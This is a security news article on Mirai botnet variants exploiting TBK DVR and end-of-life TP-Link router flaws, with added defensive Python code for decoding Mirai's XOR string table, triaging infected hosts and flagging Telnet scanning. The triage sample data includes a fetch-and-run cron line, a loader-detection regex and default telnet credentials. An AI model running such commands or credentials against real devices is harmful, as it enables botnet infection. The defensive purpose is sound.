Mirai Botnet Variants Exploit Vulnerabilities in End-of-Life Devices, Threatening IoT Security

Threat actors are aggressively targeting Internet of Things (IoT) devices, exploiting a command-injection flaw in older TBK DVRs and probing end-of-life (EoL) TP-Link Wi-Fi routers in order to deploy Mirai botnet variants. Two separate reports, from Fortinet's FortiGuard Labs on the DVR campaign and from Palo Alto Networks Unit 42 on the TP-Link probing, show the same pattern: old, unpatched devices are recruited into botnets whose impact reaches beyond the individual compromise to large-scale distributed denial-of-service (DDoS) attacks.

The Nexcorium Campaign: Exploiting Known Flaws for Botnet Dominance

The primary focus of recent investigations is a Mirai variant dubbed "Nexcorium." It is deployed by exploiting CVE-2024-3721, a medium-severity command injection vulnerability affecting TBK DVR-4104 and DVR-4216 digital video recorders. The flaw's CVSS score of 6.3 should not be read as low risk: it yields remote command execution on devices that are rarely patched and are often exposed directly to the internet, which is exactly the combination a botnet operator looks for.

According to security researcher Vincent Li, "IoT devices are increasingly prime targets for large-scale attacks due to their widespread use, lack of patching, and often weak security settings. Threat actors continue exploiting known vulnerabilities to gain initial access and deploy malware that can persist, spread, and cause distributed denial-of-service (DDoS) attacks." This statement underscores the fundamental challenges in securing the vast and often neglected IoT ecosystem.

The Nexcorium infection chain begins with command injection via CVE-2024-3721. The injected command downloads and runs a downloader script, which in turn fetches the bot payload built for the device's CPU architecture; Mirai-family loaders routinely carry builds for several Linux architectures because the victim population spans MIPS, ARM and x86 hardware. On a successful infection the message "nexuscorp has taken control" is printed on the compromised device, marking the attacker's takeover.

A Deep Dive into Nexcorium’s Capabilities

Fortinet's analysis shows that Nexcorium keeps most of the Mirai architecture: an XOR-encoded configuration table (the original Mirai hides its C2 address, credential list and other strings this way so that they are not readable in the binary on disk), a watchdog module that keeps the bot running, and a DDoS attack module. The modular design is what lets operators swap in new exploits and attack types without rewriting the bot.
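To make the XOR-encoded table concrete, here is an added example (not code from the Fortinet report or from Nexcorium itself). It reproduces the scheme used by the leaked 2016 Mirai source, whose bot/table.c XORs each string with the four bytes of the 32-bit key 0xdeadbeef in turn; Nexcorium's own key is not given on this page, so 0xdeadbeef and the sample entries below are illustrative only. The point an analyst should take away is that the four-byte key collapses to a single byte, so recovering it from a captured blob is a 256-candidate brute force.

```python
"""Mirai-style XOR-obfuscated configuration table: encode, decode, recover the key.

Added example, not code from the Fortinet report or from Nexcorium itself. The
leaked Mirai source (bot/table.c) stores its strings (C2 host, scanner credentials,
process names) XORed with the four bytes of a 32-bit key, 0xdeadbeef, applied one
after another, and decodes an entry only for the moment it is needed. Nexcorium's
own key is not given on this page; 0xdeadbeef is used purely as an illustration.
"""
from __future__ import annotations

MIRAI_TABLE_KEY = 0xDEADBEEF  # the key used by the original Mirai bot/table.c

# Constructed sample table: the kind of entries a Mirai-style bot keeps obfuscated.
SAMPLE_ENTRIES = [
    b"cnc.example.invalid",   # C2 host (hypothetical)
    b"/proc/",                # path prefix used by the process-killing module
    b"admin", b"12345",       # telnet credentials for the brute-force module
    b"shell", b"enable",      # strings sent after a successful telnet login
]


def effective_key_byte(key32: int) -> int:
    """XORing with k1, then k2, then k3, then k4 equals one XOR with k1^k2^k3^k4."""
    k1, k2, k3, k4 = ((key32 >> s) & 0xFF for s in (0, 8, 16, 24))
    return k1 ^ k2 ^ k3 ^ k4


def toggle_obf(data: bytes, key32: int = MIRAI_TABLE_KEY) -> bytes:
    """Mirai's toggle_obf(): the same call both hides and reveals an entry."""
    k = effective_key_byte(key32)
    return bytes(b ^ k for b in data)


def build_table(entries: list[bytes], key32: int = MIRAI_TABLE_KEY) -> bytes:
    """Concatenate NUL-terminated entries and obfuscate the whole blob."""
    return toggle_obf(b"".join(e + b"\x00" for e in entries), key32)


def parse_table(plain: bytes) -> list[bytes]:
    """Split a decoded blob back into its NUL-terminated entries."""
    return [e for e in plain.split(b"\x00") if e]


# Bytes an analyst expects in decoded Mirai strings: lowercase, digits, a few
# punctuation marks and the NUL terminators. Uppercase is deliberately left out
# so that a key differing from the true one only in the 0x20 bit scores lower.
_EXPECTED = set(b"abcdefghijklmnopqrstuvwxyz0123456789./:-_ \x00")


def recover_key_byte(blob: bytes) -> int:
    """Brute-force the single XOR byte that makes a captured blob look like strings.

    A four-byte key gives no more work than a one-byte key (see effective_key_byte),
    so 256 candidates cover the whole keyspace.
    """
    best_key, best_score = 0, -1
    for k in range(256):
        score = sum(1 for b in blob if (b ^ k) in _EXPECTED)
        if score > best_score:
            best_key, best_score = k, score
    return best_key


if __name__ == "__main__":
    blob = build_table(SAMPLE_ENTRIES)
    key = recover_key_byte(blob)
    print(f"recovered key byte: 0x{key:02x}")
    for entry in parse_table(bytes(b ^ key for b in blob)):
        print(" ", entry.decode())
```

Running the script against the constructed table recovers 0x22 (0xde ^ 0xad ^ 0xbe ^ 0xef) and lists the entries in the clear. On a real sample the blob would be carved from the binary's data section and the scoring alphabet adjusted to whatever strings the variant is expected to hold.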

Beyond its core functions, Nexcorium works to expand its reach. It carries an exploit for CVE-2017-17215, a vulnerability in Huawei HG532 routers that earlier Mirai variants also used, and scans for other vulnerable devices it can reach and compromises them. It also maintains a list of hard-coded usernames and passwords, which it tries in turn over Telnet to log into other hosts.

Mirai Variant Nexcorium Exploits CVE-2024-3721 to Hijack TBK DVRs for DDoS Botnet

Once a Telnet login succeeds, the malware obtains a shell, establishes persistence through crontab entries and systemd services, and connects to an external command-and-control (C2) server, from which it receives instructions to launch DDoS attacks over UDP, TCP and SMTP. Once persistence is in place, Nexcorium deletes the binary it downloaded; the process keeps running from memory, but the file is gone from disk, which complicates forensic recovery.
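The persistence and self-deletion behaviour just described leaves artefacts a responder can look for on a Linux device. The following is an added triage example, not code from the Fortinet report; the indicators are generic to Mirai-style bots (execution from world-writable paths, the download-and-run one-liners used by the loader stage of the infection chain, and a process whose /proc/<pid>/exe target is marked "(deleted)"), and the cron lines, unit file and process table it checks are constructed for the demonstration.

```python
"""Host triage for the persistence pattern above: cron entries, systemd units and
running processes whose binary has been deleted from disk.

Added example, not code from the Fortinet report. The indicators are generic to
Mirai-style Linux bots; the sample cron lines, unit file and process table below
are constructed, not taken from a real incident.
"""
from __future__ import annotations

import os
import re
from dataclasses import dataclass

# Directories a legitimate service is almost never started from.
WRITABLE_DIRS = ("/tmp/", "/var/tmp/", "/dev/shm/", "/var/run/", "/run/user/")
# Download-and-execute and decode-and-execute idioms used by IoT loader scripts.
LOADER_RE = re.compile(r"(wget|curl|tftp)\b.*\|\s*(ba)?sh\b|base64\s+(-d|--decode)")


@dataclass
class Finding:
    source: str     # "cron", "systemd" or "proc"
    reason: str
    evidence: str


def check_cron_lines(lines: list[str], source: str = "cron") -> list[Finding]:
    """Flag crontab lines that run from writable dirs or fetch-and-execute code."""
    findings = []
    for line in lines:
        line = line.strip()
        if not line or line.startswith("#"):
            continue
        if any(d in line for d in WRITABLE_DIRS):
            findings.append(Finding(source, "runs from world-writable path", line))
        elif LOADER_RE.search(line):
            findings.append(Finding(source, "download/decode-and-execute", line))
    return findings


def check_systemd_unit(name: str, text: str) -> list[Finding]:
    """Flag unit files whose Exec* lines point at writable dirs or loader one-liners."""
    exec_lines = [l.partition("=")[2] for l in text.splitlines()
                  if l.strip().startswith(("ExecStart", "ExecStop", "ExecReload"))]
    return [Finding("systemd", f.reason, f"{name}: {f.evidence}")
            for f in check_cron_lines(exec_lines, "systemd")]


def check_processes(procs: list[tuple[int, str, str]]) -> list[Finding]:
    """Flag processes whose executable was unlinked after launch.

    Each tuple is (pid, readlink('/proc/<pid>/exe'), cmdline). The kernel appends
    " (deleted)" to the link target when the file is gone, which is exactly what a
    bot that removes its own binary after starting looks like.
    """
    return [Finding("proc", "running binary deleted from disk", f"pid {pid} {exe} {cmd}")
            for pid, exe, cmd in procs if exe.endswith(" (deleted)")]


def live_process_table() -> list[tuple[int, str, str]]:
    """Collect (pid, exe, cmdline) from /proc on a real Linux host (root sees all pids)."""
    table = []
    for pid in (p for p in os.listdir("/proc") if p.isdigit()):
        try:
            exe = os.readlink(f"/proc/{pid}/exe")
            with open(f"/proc/{pid}/cmdline", "rb") as fh:
                cmd = fh.read().replace(b"\x00", b" ").decode(errors="replace").strip()
        except OSError:
            continue  # kernel thread, or not ours to read
        table.append((int(pid), exe, cmd))
    return table


# Constructed sample data (not from a real incident).
SAMPLE_CRON = [
    "# m h dom mon dow command",
    "0 3 * * * /usr/bin/certbot renew --quiet",
    "@reboot /tmp/.x/nex -d",
    "*/5 * * * * wget -q http://198.51.100.7/d.sh -O- | sh",
]
SAMPLE_UNIT = ("[Unit]\nDescription=system helper\n[Service]\n"
               "ExecStart=/dev/shm/.s/nex\nRestart=always\n"
               "[Install]\nWantedBy=multi-user.target\n")
SAMPLE_PROCS = [
    (1, "/usr/lib/systemd/systemd", "/sbin/init"),
    (4242, "/tmp/.x/nex (deleted)", "nex -d"),
]


def triage(cron=SAMPLE_CRON, unit=SAMPLE_UNIT, procs=SAMPLE_PROCS) -> list[Finding]:
    """Run all three checks; on a live host pass the real crontabs, units and processes."""
    return (check_cron_lines(cron) + check_systemd_unit("helper.service", unit)
            + check_processes(procs))


if __name__ == "__main__":
    for f in triage():
        print(f"[{f.source}] {f.reason}: {f.evidence}")
```

On a live device the inputs would come from /etc/crontab, /var/spool/cron, /etc/systemd/system and live_process_table(); a hit from check_processes is the one to act on first, because the only remaining copy of the bot is the running image, which can still be dumped from /proc/<pid>/exe before the device is powered off.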

Fortinet’s report emphasizes Nexcorium’s adherence to modern IoT botnet characteristics: "The Nexcorium malware displays typical traits of modern IoT-focused botnets, combining vulnerability exploitation, support for multiple architectures, and various persistence methods to sustain long-term access to infected systems. Its use of known exploits, such as CVE-2017-17215, along with extensive brute-force capabilities, underscores its adaptability and efficacy in increasing its infection reach."

The Shadow of End-of-Life Devices: TP-Link Routers Under Fire

The second report concerns end-of-life (EoL) TP-Link Wi-Fi routers. Palo Alto Networks Unit 42 has observed automated scanning and probing for CVE-2023-33538, a command injection vulnerability with a higher CVSS score of 8.8 that affects TP-Link wireless router models the manufacturer no longer supports.

While the in-the-wild exploitation attempts for CVE-2023-33538 that Unit 42 observed were flawed and unsuccessful, the underlying vulnerability remains a real concern. Unit 42 researchers Asher Davila, Malav Vyas, and Chris Navarrete noted, "Although the in-the-wild attacks we observed were flawed and would fail, our analysis confirms the underlying vulnerability is real. Successful exploitation requires authentication to the router's web interface." In other words, the flaw is exploitable by anyone holding valid credentials, and on a router still running its factory defaults that is a very low bar.

The U.S. Cybersecurity and Infrastructure Security Agency (CISA) added CVE-2023-33538 to its Known Exploited Vulnerabilities (KEV) catalog in June 2025. A KEV listing records that the vulnerability has been exploited in the wild and, under Binding Operational Directive 22-01, obliges U.S. federal civilian agencies to remediate it by a set deadline; for hardware that no longer receives firmware, remediation means taking the device out of service.

The exploit code observed targeting CVE-2023-33538 contains numerous references to the string "Condi," suggesting a link to the previously identified Condi malware family. The variant can also update itself to newer versions and can act as a web server, serving its payload to other devices that connect to it.

A Recurring Threat: The Mirai Legacy and Evolving Tactics

This is not the first time CVE-2024-3721 has been weaponized. Over the past year the same flaw has been used to deploy not only Mirai variants but also RondoDox, a comparatively new botnet. In September 2025, security firm CloudSEK also disclosed a large-scale "loader-as-a-service" botnet that was distributing RondoDox, Mirai, and Morte payloads, gaining its footholds through weak credentials and known vulnerabilities in routers, IoT devices, and enterprise applications.

The persistence of Mirai and its derivatives in the threat landscape is a testament to their effectiveness and the sheer volume of vulnerable IoT devices available. Mirai, first discovered in 2016, gained notoriety for its ability to harness the power of compromised IoT devices to launch massive DDoS attacks. Its continued evolution and adaptation by various threat groups underscore the enduring challenge of securing this ecosystem.

Broader Implications and the Imperative of Device Security

The exploitation of vulnerabilities in EoL devices presents a critical dilemma for consumers and businesses alike. Manufacturers discontinuing support for older hardware leaves a significant installed base vulnerable to known exploits. The fact that these devices are often deployed and then forgotten, with default credentials rarely changed, exacerbates the problem.

Unit 42’s analysis of the TP-Link situation emphasizes this point: "For the foreseeable future, the security landscape will continue to be shaped by the persistent risk of default credentials in IoT devices. These credentials can turn a limited, authenticated vulnerability into a critical entry point for determined attackers."

The implications of these ongoing attacks are far-reaching. Successful compromises can lead to:

  • Large-Scale DDoS Attacks: Botnets comprised of thousands or even millions of compromised devices can generate overwhelming traffic, disrupting online services, websites, and critical infrastructure.
  • Network Intrusion: Once inside a network, compromised IoT devices can serve as a pivot point for attackers to move laterally and compromise other, more sensitive systems.
  • Data Theft and Surveillance: Certain IoT devices, like DVRs, handle sensitive data. Their compromise could lead to unauthorized access and surveillance.
  • Ransomware and Malware Distribution: Botnets can be used to distribute other forms of malware, including ransomware, further escalating the damage.

Recommendations and the Path Forward

The findings from Fortinet and Palo Alto Networks serve as a stark reminder of the need for proactive security measures. The following recommendations are crucial for mitigating the risks associated with vulnerable IoT devices:

  • Device Replacement: Owners of the affected TBK DVR-4104/DVR-4216 units and of EoL TP-Link routers should prioritize replacing them with supported models, since no fix will ever ship for hardware the vendor has abandoned.
  • Firmware Updates: Keep the firmware of all IoT devices and network equipment current so that known vulnerabilities are closed before scanners find them.
  • Default Credential Changes: Always change default usernames and passwords on new devices, and use strong, unique passwords for every connected device and service; this is what separates an authenticated flaw such as CVE-2023-33538 from an open door.
  • Network Segmentation: Put IoT devices on their own network segment with no route to workstations or servers, so that a compromised DVR or router cannot be used as a pivot into more sensitive systems.
  • Security Monitoring: Watch for the traffic a bot produces: outbound Telnet connection attempts to many addresses, connections to unfamiliar C2 servers, and DDoS-volume traffic from a device that should only ever stream video.
  • Awareness and Education: Promote awareness about the security risks associated with IoT devices and the importance of secure configuration practices.
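For the segmentation and monitoring recommendations above, here is an added example (not from either vendor report) that runs two checks over flow records: whether any host in an IoT segment reaches internal addresses outside its allow-list, and whether any host fans out to many distinct targets on the Telnet ports Mirai's scanner uses. The subnets, thresholds and the flow records themselves are constructed assumptions; in production the records would come from NetFlow/IPFIX or a firewall log.

```python
"""Flow-log checks for two of the recommendations above: segmentation of IoT
devices and monitoring for Mirai-style Telnet scanning.

Added example, not from either vendor report. Input is a list of constructed flow
records (timestamp, src, dst, dst_port); in practice they would come from
NetFlow/IPFIX or a firewall log. Subnets and thresholds are assumptions to tune.
"""
from __future__ import annotations

import ipaddress
from collections import defaultdict
from dataclasses import dataclass

IOT_SUBNET = ipaddress.ip_network("10.20.0.0/24")          # DVRs, routers, cameras
INTERNAL = ipaddress.ip_network("10.0.0.0/8")
ALLOWED_FROM_IOT = [ipaddress.ip_network("10.20.0.0/24"),  # talk among themselves
                    ipaddress.ip_network("10.1.1.53/32")]  # and to the DNS resolver
TELNET_PORTS = {23, 2323}   # Mirai's scanner tries both
FANOUT_THRESHOLD = 20       # distinct targets on Telnet ports ...
WINDOW_SECONDS = 60         # ... within this window


@dataclass(frozen=True)
class Flow:
    ts: float
    src: str
    dst: str
    dport: int


def segmentation_violations(flows: list[Flow]) -> list[Flow]:
    """IoT-subnet hosts reaching internal addresses outside their allow-list."""
    out = []
    for f in flows:
        s, d = ipaddress.ip_address(f.src), ipaddress.ip_address(f.dst)
        if s in IOT_SUBNET and d in INTERNAL and not any(d in n for n in ALLOWED_FROM_IOT):
            out.append(f)
    return out


def telnet_fanout(flows: list[Flow]) -> dict[str, int]:
    """Sources that touch >= FANOUT_THRESHOLD distinct hosts on 23/2323 within WINDOW_SECONDS.

    Returns {src: peak distinct-target count}. A sliding window over each source's
    Telnet flows keeps a slow, legitimate admin session from tripping the rule.
    """
    by_src: dict[str, list[Flow]] = defaultdict(list)
    for f in sorted(flows, key=lambda x: x.ts):
        if f.dport in TELNET_PORTS:
            by_src[f.src].append(f)
    hits = {}
    for src, fl in by_src.items():
        peak, start = 0, 0
        for end in range(len(fl)):
            while fl[end].ts - fl[start].ts > WINDOW_SECONDS:
                start += 1
            peak = max(peak, len({x.dst for x in fl[start:end + 1]}))
        if peak >= FANOUT_THRESHOLD:
            hits[src] = peak
    return hits


def sample_flows() -> list[Flow]:
    """Constructed traffic: one scanning DVR, one legitimate admin, one segmentation slip."""
    flows = [Flow(0, "10.20.0.15", "10.1.1.53", 53),      # allowed: DNS
             Flow(1, "10.20.0.15", "203.0.113.5", 80),    # internet: egress policy elsewhere
             Flow(2, "10.20.0.22", "10.3.0.7", 445)]      # IoT host reaching a file server
    # the compromised DVR sweeps 25 targets in under 30 s, the way a Mirai scanner does
    flows += [Flow(10 + i, "10.20.0.15", f"198.51.100.{i + 1}", 23 if i % 2 else 2323)
              for i in range(25)]
    # an operator walking three switches over ten minutes is not a scanner
    flows += [Flow(100 + 200 * i, "10.5.0.9", f"10.9.0.{i + 1}", 23) for i in range(3)]
    return flows


if __name__ == "__main__":
    flows = sample_flows()
    for f in segmentation_violations(flows):
        print(f"segmentation: {f.src} -> {f.dst}:{f.dport}")
    for src, n in telnet_fanout(flows).items():
        print(f"telnet fan-out: {src} reached {n} hosts within {WINDOW_SECONDS}s")
```

The fan-out rule is deliberately blind to destination: a DVR sweeping the internet and one sweeping the LAN look the same, and both mean the device is already infected. The segmentation rule only covers internal destinations; outbound connections from the IoT segment to the internet belong in an egress policy, where the right answer for a DVR is usually to allow nothing but the vendor's update host.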

The persistent exploitation of vulnerabilities in IoT devices, particularly those that are end-of-life, underscores a fundamental weakness in the current digital infrastructure. As the number of connected devices continues to grow exponentially, the strategies employed by threat actors will undoubtedly evolve. The ongoing battle against botnets like Mirai and its variants necessitates a concerted effort from manufacturers, security researchers, and end-users to build a more resilient and secure connected future. The message is clear: neglecting IoT security is no longer an option, but a direct invitation to compromise.
